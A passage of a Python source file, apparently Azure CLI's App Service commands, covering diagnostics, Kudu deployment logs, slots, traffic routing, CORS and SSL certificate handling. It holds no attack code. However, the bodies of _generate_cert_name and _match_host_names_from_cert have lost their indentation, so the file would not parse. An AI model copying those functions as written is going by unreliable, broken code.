    """Report whether Docker CI is enabled and, when it is, the CI/CD webhook URL."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    docker_enabled = any(s['name'] == 'DOCKER_ENABLE_CI' and s['value'] == 'true'
                         for s in settings)
    cd_settings = {'DOCKER_ENABLE_CI': docker_enabled}
    if docker_enabled:
        credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
        cd_settings['CI_CD_URL'] = (credentials.scm_uri + '/docker/hook') if credentials else ''
    return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
    """Open the site in the default browser, optionally tailing its log stream."""
    open_page_in_browser(_get_url(cmd, resource_group_name, name, slot))
    if logs:
        get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
    """Build the browsable URL of a site, using https when any hostname has SSL enabled."""
    SslState = cmd.get_models('SslState')
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    # picks the custom domain URL in case a domain is assigned
    host = site.enabled_host_names[0]
    has_ssl = any(h.ssl_state != SslState.disabled for h in site.host_name_ssl_states)
    scheme = 'https' if has_ssl else 'http'
    return scheme + '://' + host
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    """Configure site diagnostics: application logs, web-server/container logs,
    detailed error messages and failed-request tracing.

    Cleanup: ``level = application_logging != 'off'`` was computed twice
    back-to-back; the redundant second assignment is removed (same value).
    """
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
                                       HttpLogsConfig, FileSystemHttpLogsConfig,
                                       EnabledConfig)
    client = web_client_factory(cmd.cli_ctx)
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    location = site.location

    application_logs = None
    if application_logging:
        fs_log = None
        blob_log = None
        # `level` is re-purposed as an on/off flag: 'off' disables, anything else enables
        level = application_logging != 'off'
        if application_logging in ['filesystem', 'off']:
            fs_log = FileSystemApplicationLogsConfig(level=level)
        if application_logging in ['azureblobstorage', 'off']:
            blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
                                                             sas_url=None)
        application_logs = ApplicationLogsConfig(file_system=fs_log,
                                                 azure_blob_storage=blob_log)

    http_logs = None
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
                                                             enabled=turned_on)
        http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)

    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(enabled=detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(enabled=failed_request_tracing))
    site_log_config = SiteLogsConfig(location=location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)

    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
                                   slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
    """Show the site's diagnostic-logs configuration."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
    """Fetch the Kudu log entries for one deployment.

    When *deployment_id* is omitted, the most recent deployment (by
    ``start_time``) is located first and its log URL used; returns [] when
    no deployment log is available. Raises CLIError on HTTP failures.
    """
    import urllib3
    import requests

    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))

    deployment_log_url = ''
    if deployment_id:
        deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
    else:
        # no id given: list deployments and pick the newest one's log URL
        deployments_url = '{}/api/deployments/'.format(scm_url)
        response = requests.get(deployments_url, headers=headers)

        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployments_url, response.status_code, response.reason))

        sorted_logs = sorted(
            response.json(),
            key=lambda x: x['start_time'],
            reverse=True
        )
        if sorted_logs and sorted_logs[0]:
            deployment_log_url = sorted_logs[0].get('log_url', '')

    if deployment_log_url:
        response = requests.get(deployment_log_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployment_log_url, response.status_code, response.reason))
        return response.json()
    return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
    """List the Kudu deployment records of a site.

    BUGFIX: the failure message used to report ``scm_url`` even though the
    request was made to the deployments endpoint; it now reports the URL
    actually requested, matching ``show_deployment_log``.
    """
    import urllib3
    import requests

    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    deployment_log_url = '{}/api/deployments/'.format(scm_url)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))

    response = requests.get(deployment_log_url, headers=headers)
    if response.status_code != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            deployment_log_url, response.status_code, response.reason))
    return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    """Enable or disable auto-swap on a slot (swap target defaults to 'production')."""
    client = web_client_factory(cmd.cli_ctx)
    site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    if disable:
        site_config.auto_swap_slot_name = ''
    else:
        site_config.auto_swap_slot_name = auto_swap_slot or 'production'
    return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
    """List a webapp's deployment slots with short names and their plan name attached."""
    client = web_client_factory(cmd.cli_ctx)
    slots = list(client.web_apps.list_slots(resource_group_name, webapp))
    for item in slots:
        item.name = item.name.split('/')[-1]
        # surface the plan name instead of the raw resource id
        setattr(item, 'app_service_plan', parse_resource_id(item.server_farm_id)['name'])
        del item.server_farm_id
    return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
    """Swap, preview-swap, or reset slot configuration.

    action: 'swap' performs the swap; 'preview' applies the source slot's
    config to the target; anything else resets previously-applied config.
    The target defaults to 'production'.
    """
    client = web_client_factory(cmd.cli_ctx)
    if action == 'swap':
        return client.web_apps.swap_slot_slot(resource_group_name, webapp,
                                              slot, target_slot or 'production', True)
    if action == 'preview':
        if target_slot is None:
            return client.web_apps.apply_slot_config_to_production(resource_group_name,
                                                                   webapp, slot, True)
        return client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
                                                             slot, target_slot, True)
    # reset: we will reset both source slot and target slot
    if target_slot is None:
        client.web_apps.reset_production_slot_config(resource_group_name, webapp)
    else:
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
    return None
def delete_slot(cmd, resource_group_name, webapp, slot):
    """Delete a deployment slot of a webapp."""
    client = web_client_factory(cmd.cli_ctx)
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
    """Route traffic percentages to slots; *distribution* is a list of 'slot=percentage'."""
    RampUpRule = cmd.get_models('RampUpRule')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    configs = get_site_configs(cmd, resource_group_name, name)
    # a slot's hostname is '<app>-<slot>.<rest of default hostname>'
    host_prefix, _, host_rest = site.default_host_name.partition('.')
    rules = []
    for entry in distribution:
        slot, percentage = entry.split('=')
        rules.append(RampUpRule(action_host_name='{}-{}.{}'.format(host_prefix, slot, host_rest),
                                reroute_percentage=float(percentage),
                                name=slot))
    configs.experiments.ramp_up_rules = rules
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)

    return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
    """Show the site's current traffic-routing (ramp-up) rules."""
    return get_site_configs(cmd, resource_group_name, name).experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
    """Remove all traffic-routing rules by setting an empty distribution."""
    set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Append origins to the site's CORS allow-list and return the updated CORS settings."""
    from azure.mgmt.web.models import CorsSettings
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if not configs.cors:
        configs.cors = CorsSettings()
    existing = configs.cors.allowed_origins or []
    configs.cors.allowed_origins = existing + allowed_origins
    updated = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return updated.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Remove origins from the site's CORS allow-list (all of them when none are given)."""
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if configs.cors:
        if allowed_origins:
            remaining = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
            configs.cors.allowed_origins = remaining
        else:
            configs.cors.allowed_origins = []
    # note: the update call runs regardless of whether CORS was configured
    configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
    """Return the site's current CORS settings."""
    site_configs = get_site_configs(cmd, resource_group_name, name, slot)
    return site_configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
    """Stream live site logs from the Kudu /logstream endpoint to stdout until Ctrl+C."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url = '{}/{}'.format(streaming_url, provider.lstrip('/'))
    user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    worker = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    worker.daemon = True
    worker.start()
    # Keep the main thread idling so Ctrl+C can stop the command.
    while True:
        time.sleep(100)
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
    """Download the site's historical logs from the Kudu /dump endpoint into log_file."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    dump_url = scm_url.rstrip('/') + '/dump'
    publishing_user, publishing_password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    _get_log(dump_url, publishing_user, publishing_password, log_file)
    logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
    """Fetch the site's publishing (deployment) user name and password."""
    poller = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
    publishing_profile = poller.result()
    return publishing_profile.publishing_user_name, publishing_profile.publishing_password
def _get_log(url, user_name, password, log_file=None):
    """GET logs from a Kudu endpoint with basic auth.

    When ``log_file`` is given, the body is downloaded to that path in 1 KB
    chunks; otherwise the body is streamed to stdout until the server closes
    the connection. Raises CLIError on any non-200 response.
    """
    import certifi
    import urllib3
    try:
        # Prefer pyOpenSSL-backed TLS when available; harmless no-op otherwise.
        import urllib3.contrib.pyopenssl
        urllib3.contrib.pyopenssl.inject_into_urllib3()
    except ImportError:
        pass
    http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    # preload_content=False keeps the body unread so it can be chunked/streamed below.
    r = http.request(
        'GET',
        url,
        headers=headers,
        preload_content=False
    )
    if r.status != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            url, r.status, r.reason))
    if log_file:  # download logs
        with open(log_file, 'wb') as f:
            while True:
                data = r.read(1024)
                if not data:
                    break
                f.write(data)
    else:  # streaming
        std_encoding = sys.stdout.encoding
        for chunk in r.stream():
            if chunk:
                # Extra encode() and decode for stdout which does not support 'utf-8'
                print(chunk.decode(encoding='utf-8', errors='replace')
                      .encode(std_encoding, errors='replace')
                      .decode(std_encoding, errors='replace'), end='')  # each line of log has CRLF.
    r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
    """Upload a .pfx certificate to the web app's resource group.

    :param certificate_password: password used to decrypt the .pfx file.
    :param certificate_file: path to the .pfx file on disk.
    :return: the created/updated Certificate resource.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    # Bug fix: read via a context manager; the original left the file handle open.
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
    hosting_environment_profile_param = (webapp.hosting_environment_profile.name
                                         if webapp.hosting_environment_profile else '')
    thumb_print = _get_cert(certificate_password, certificate_file)
    # Certificate name encodes thumbprint + ASE + location + RG for uniqueness.
    cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
                                    webapp.location, resource_group_name)
    cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
                       location=webapp.location, server_farm_id=webapp.server_farm_id)
    return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    """Decrypt the .pfx file and return its SHA-1 thumbprint as uppercase hex without colons."""
    # Bug fix: read via a context manager; the original `open(...).read()` leaked the handle.
    with open(certificate_file, 'rb') as f:
        pfx_data = f.read()
    p12 = OpenSSL.crypto.load_pkcs12(pfx_data, certificate_password)
    cert = p12.get_certificate()
    digest_algorithm = 'sha1'
    # cert.digest returns bytes like b'AA:BB:...'; strip the colon separators.
    thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
    return thumbprint
def list_ssl_certs(cmd, resource_group_name):
    """List all App Service certificates in the resource group."""
    web_client = web_client_factory(cmd.cli_ctx)
    return web_client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
    """Show details of a single App Service certificate."""
    web_client = web_client_factory(cmd.cli_ctx)
    return web_client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
    """Delete the certificate in the resource group that matches the thumbprint."""
    client = web_client_factory(cmd.cli_ctx)
    certs = client.certificates.list_by_resource_group(resource_group_name)
    match = next((c for c in certs if c.thumbprint == certificate_thumbprint), None)
    if match is None:
        raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
    return client.certificates.delete(resource_group_name, match.name)
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
    """Link a Key Vault certificate to the web app as an App Service certificate.

    ``key_vault`` is either a vault name (resolved within the current
    subscription) or a full Key Vault resource ID. Warns (without failing)
    when the vault cannot be found or when the App Service principal's
    Secret:Get permission cannot be verified.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    kv_id = None
    if not is_valid_resource_id(key_vault):
        # Bare vault name: scan the current subscription's vaults for a match.
        kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
        key_vaults = kv_client.vaults.list_by_subscription()
        for kv in key_vaults:
            if key_vault == kv.name:
                kv_id = kv.id
                break
    else:
        kv_id = key_vault
    if kv_id is None:
        # Vault not found: warn with a hint for cross-subscription usage and bail out.
        kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
                 'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
                 '\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
                 '--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
                 'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
        logger.warning(kv_msg)
        return
    kv_id_parts = parse_resource_id(kv_id)
    kv_name = kv_id_parts['name']
    kv_resource_group_name = kv_id_parts['resource_group']
    kv_subscription = kv_id_parts['subscription']
    cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
    lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
    lnk_msg = 'Find more details here: {}'.format(lnk)
    # Best-effort permission check; import proceeds either way.
    if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
        logger.warning('Unable to verify Key Vault permissions.')
        logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
        logger.warning(lnk_msg)
    kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
                              key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
    return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
                                                certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
    """Create a free App Service managed certificate for a custom hostname.

    Requires a paid (non-Free/Shared) plan and that ``hostname`` is already
    bound to the app. Falls back to manual polling of the 202 Location header
    because the backend returns an async operation the SDK cannot poll.
    """
    Certificate = cmd.get_models('Certificate')
    hostname = hostname.lower()
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        slot_text = "Deployment slot {} in ".format(slot) if slot else ''
        raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
    parsed_plan_id = parse_resource_id(webapp.server_farm_id)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
        raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
    if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
        slot_text = " --slot {}".format(slot) if slot else ""
        raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
                       "Use 'az webapp config hostname add --resource-group {2} "
                       "--webapp-name {1}{3} --hostname {0}' "
                       "to register the hostname.".format(hostname, name, resource_group_name, slot_text))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    easy_cert_def = Certificate(location=location, canonical_name=hostname,
                                server_farm_id=server_farm_id, password='')
    # TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
    try:
        return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
                                                    certificate_envelope=easy_cert_def)
    except DefaultErrorResponseException as ex:
        # A 202 + Location header means "accepted, still provisioning": poll manually.
        poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
        if ex.response.status_code == 202 and poll_url:
            r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
            poll_timeout = time.time() + 60 * 2  # 2 minute timeout
            while r.status_code != 200 and time.time() < poll_timeout:
                time.sleep(5)
                r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
            if r.status_code == 200:
                try:
                    return r.json()
                except ValueError:
                    # Body wasn't JSON; return the raw text instead.
                    return r.text
            # Timed out: creation continues server-side; tell the user how to check on it.
            logger.warning("Managed Certificate creation in progress. Please use the command "
                           "'az webapp config ssl show -g %s --certificate-name %s' "
                           " to view your certificate once it is created", resource_group_name, hostname)
            return
        raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
    """Return True when the App Service service principal has Secret:Get on the vault.

    Returns False when the vault is in another subscription (cannot check) or
    when no access policy grants the permission.
    """
    from azure.cli.command_modules.role._client_factory import _graph_client_factory
    from azure.graphrbac.models import GraphErrorException
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription = get_subscription_id(cmd.cli_ctx)
    # Cannot check if key vault is in another subscription
    if subscription != key_vault_subscription:
        return False
    kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
    vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
    # Check for Microsoft.Azure.WebSites app registration
    # Well-known app IDs for the App Service resource provider (public and Gov clouds).
    AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
    AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
    graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
    for policy in vault.properties.access_policies:
        try:
            sp = graph_sp_client.get(policy.object_id)
            if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
                for perm in policy.permissions.secrets:
                    if perm == "Get":
                        return True
        except GraphErrorException:
            pass  # Lookup will fail for non service principals (users, groups, etc.)
    return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
                                host_name, ssl_state, thumbprint, slot=None):
    """Patch a single hostname's SSL binding (state + thumbprint) on the site."""
    Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
    ssl_binding = HostNameSslState(name=host_name,
                                   ssl_state=ssl_state,
                                   thumbprint=thumbprint,
                                   to_update=True)
    site_patch = Site(host_name_ssl_states=[ssl_binding],
                      location=webapp.location, tags=webapp.tags)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
                                   slot, site_patch)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind or unbind the certificate with the given thumbprint on the app's hostnames.

    Raises CLIError when the app or a matching certificate does not exist.
    """
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))
    # Certificates live in the plan's resource group, which may differ from the app's.
    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
    for webapp_cert in webapp_certs:
        if webapp_cert.thumbprint == certificate_thumbprint:
            # Single non-wildcard host on the cert: bind it directly.
            if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
                return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                                   webapp_cert.host_names[0], ssl_type,
                                                   certificate_thumbprint, slot)
            # Wildcard or multi-host cert: bind every app hostname the cert covers.
            query_result = list_hostnames(cmd, resource_group_name, name, slot)
            hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
            to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
            for h in to_update:
                _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                            h, ssl_type, certificate_thumbprint, slot)
            return show_webapp(cmd, resource_group_name, name, slot)
    raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind a certificate to the app using SNI or IP-based SSL."""
    SslState = cmd.get_models('SslState')
    if ssl_type == 'SNI':
        target_state = SslState.sni_enabled
    else:
        target_state = SslState.ip_based_enabled
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
                               target_state, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
    """Remove the SSL binding for the certificate with the given thumbprint."""
    SslState = cmd.get_models('SslState')
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
                               SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
    """Helper that loads and resolves runtime stacks in 'name|version' form
    (e.g. 'node|6.1', 'php|5.5') for Windows and Linux web apps."""
    def __init__(self, cmd, client, linux=False):
        self._cmd = cmd
        self._client = client
        self._linux = linux
        self._stacks = []  # lazily-populated cache of stack dicts
    @staticmethod
    def remove_delimiters(runtime):
        """Normalize a runtime string so '|', ' ' and ':' separators all become '|'."""
        import re
        runtime = re.split('[| :]', runtime)  # delimiters allowed: '|', ' ', ':'
        return '|'.join(filter(None, runtime))
    def resolve(self, display_name):
        """Return the stack whose displayName matches (case-insensitive), or None."""
        self._load_stacks_hardcoded()
        return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
                    None)
    @property
    def stacks(self):
        # Loading is lazy: the hardcoded stacks file is read on first access.
        self._load_stacks_hardcoded()
        return self._stacks
    @staticmethod
    def update_site_config(stack, site_config, cmd=None):
        """Apply the stack's config key/value pairs directly onto site_config attributes."""
        for k, v in stack['configs'].items():
            setattr(site_config, k, v)
        return site_config
    @staticmethod
    def update_site_appsettings(cmd, stack, site_config):
        """Merge the stack's configs into site_config.app_settings (update-or-append)."""
        NameValuePair = cmd.get_models('NameValuePair')
        if site_config.app_settings is None:
            site_config.app_settings = []
        for k, v in stack['configs'].items():
            already_in_appsettings = False
            for app_setting in site_config.app_settings:
                if app_setting.name == k:
                    already_in_appsettings = True
                    app_setting.value = v
            if not already_in_appsettings:
                site_config.app_settings.append(NameValuePair(name=k, value=v))
        return site_config
    def _load_stacks_hardcoded(self):
        """Populate self._stacks from the bundled RUNTIME_STACKS JSON file (no-op if cached)."""
        if self._stacks:
            return
        result = []
        if self._linux:
            result = get_file_json(RUNTIME_STACKS)['linux']
            for r in result:
                r['setter'] = _StackRuntimeHelper.update_site_config
        else:  # Windows stacks
            result = get_file_json(RUNTIME_STACKS)['windows']
            for r in result:
                # node runtimes are configured via app settings; all others via site config
                r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                               r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
    # Currently using hardcoded values instead of this function. This function calls the stacks API;
    # Stacks API is updated with Antares deployments,
    # which are infrequent and don't line up with stacks EOL schedule.
    def _load_stacks(self):
        """Populate self._stacks from the live provider stacks API (currently unused)."""
        if self._stacks:
            return
        os_type = ('Linux' if self._linux else 'Windows')
        raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
        bytes_value = raw_stacks._get_next().content  # pylint: disable=protected-access
        json_value = bytes_value.decode('utf8')
        json_stacks = json.loads(json_value)
        stacks = json_stacks['value']
        result = []
        if self._linux:
            for properties in [(s['properties']) for s in stacks]:
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': (default_minor['runtimeVersion']
                                        if default_minor else major['runtimeVersion'])
                    })
        else:  # Windows stacks
            config_mappings = {
                'node': 'WEBSITE_NODE_DEFAULT_VERSION',
                'python': 'python_version',
                'php': 'php_version',
                'aspnet': 'net_framework_version'
            }
            # get all stack version except 'java'
            for stack in stacks:
                if stack['name'] not in config_mappings:
                    continue
                name, properties = stack['name'], stack['properties']
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': name + '|' + major['displayVersion'],
                        'configs': {
                            config_mappings[name]: (default_minor['runtimeVersion']
                                                    if default_minor else major['runtimeVersion'])
                        }
                    })
            # deal with java, which pairs with java container version
            java_stack = next((s for s in stacks if s['name'] == 'java'))
            java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
            for java_version in java_stack['properties']['majorVersions']:
                for fx in java_container_stack['properties']['frameworks']:
                    for fx_version in fx['majorVersions']:
                        result.append({
                            'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
                                                                  fx['display'],
                                                                  fx_version['displayVersion']),
                            'configs': {
                                'java_version': java_version['runtimeVersion'],
                                'java_container': fx['name'],
                                'java_container_version': fx_version['runtimeVersion']
                            }
                        })
        for r in result:
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
    """Return the instrumentation key of an Application Insights component, or raise CLIError."""
    appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
    component = appinsights_client.components.get(resource_group, name)
    if component is None or component.instrumentation_key is None:
        raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
    return component.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
                                        number_of_workers=None, max_burst=None, location=None, tags=None):
    """Create an App Service plan suitable for function apps.

    --max-burst is only valid on Elastic Premium plans; worker counts are
    validated to the 0-20 range.
    """
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    tier = get_sku_name(sku)
    if max_burst is not None:
        if tier.lower() != "elasticpremium":
